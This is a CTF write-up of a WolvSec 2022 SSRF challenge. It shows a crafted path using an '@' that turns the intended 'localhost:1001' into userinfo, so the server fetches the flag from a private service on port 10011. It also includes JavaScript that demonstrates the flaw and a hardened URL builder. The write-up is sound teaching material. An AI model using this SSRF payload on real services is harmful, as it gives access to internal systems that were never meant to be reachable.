Tags: ssrf 

Rating:

Challenge source and solver script: [https://github.com/sambrow/wolvsec_ctf_2022/](https://github.com/sambrow/wolvsec_ctf_2022/)

Intended solve (by the challenge author):

https://wsc-2022-web-4-bvel4oasra-uc.a.run.app/ssrf?path=password@localhost:10011/flag

This causes the following code:

```
const url = `http://localhost:${private1Port}${normalizedPath}`
```

to construct the following url:

http://localhost:1001password@localhost:10011/flag

The syntax here is:

```
http://<username>:<password>@<domain>:<port>/<resource>
```

The username/password are simply ignored by these apps, so everything after the `@` is under your control and can be used to reach the private2.js app and retrieve the flag.
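To make the defect concrete, here is an added example (not code from the challenge or the solver repo) that parses the URL the template string produces and shows the hardened construction a maintainer would want: resolve the user-supplied path against a fixed base and refuse any result whose origin or credentials differ. It assumes `PRIVATE1_PORT = 1001` to match the URL above, and runs on Node with the global WHATWG `URL`.

```javascript
// Port of the intended internal service; constructed to match the writeup.
const PRIVATE1_PORT = 1001;

// Vulnerable construction, as in the challenge: the path is appended directly
// after "host:port", so characters like '@' and ':' in it are interpreted as
// part of the URL authority rather than the path.
function buildUrlUnsafe(normalizedPath) {
  return `http://localhost:${PRIVATE1_PORT}${normalizedPath}`;
}

// Show where a request for a given URL string would actually be sent.
// Any HTTP client that follows the WHATWG URL parser treats everything before
// the last '@' in the authority as userinfo and the rest as the real host.
function describeTarget(urlString) {
  const u = new URL(urlString);
  return {
    username: u.username,
    password: u.password,
    hostname: u.hostname,
    port: u.port,
    pathname: u.pathname,
  };
}

// Hardened construction: resolve the path relative to a fixed base URL, then
// verify the origin (scheme + host + port) is unchanged and no credentials
// crept in. A path with '@' or ':' becomes an ordinary path segment; an
// attempt to swap the authority ("//other:10011/flag", "http://...") is rejected.
function buildUrlSafe(normalizedPath) {
  const base = new URL(`http://localhost:${PRIVATE1_PORT}/`);
  const candidate = new URL(normalizedPath, base);
  if (candidate.origin !== base.origin || candidate.username || candidate.password) {
    throw new Error('path would send the request to a different origin');
  }
  return candidate.href;
}
```

Running `describeTarget(buildUrlUnsafe('password@localhost:10011/flag'))` shows the request goes to port 10011 with the intended `localhost:1001` swallowed as userinfo, while `buildUrlSafe` keeps the same input on port 1001.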

Note: There was at least one very creative solve that did not require use of the @ symbol. Hoping that person will create a writeup.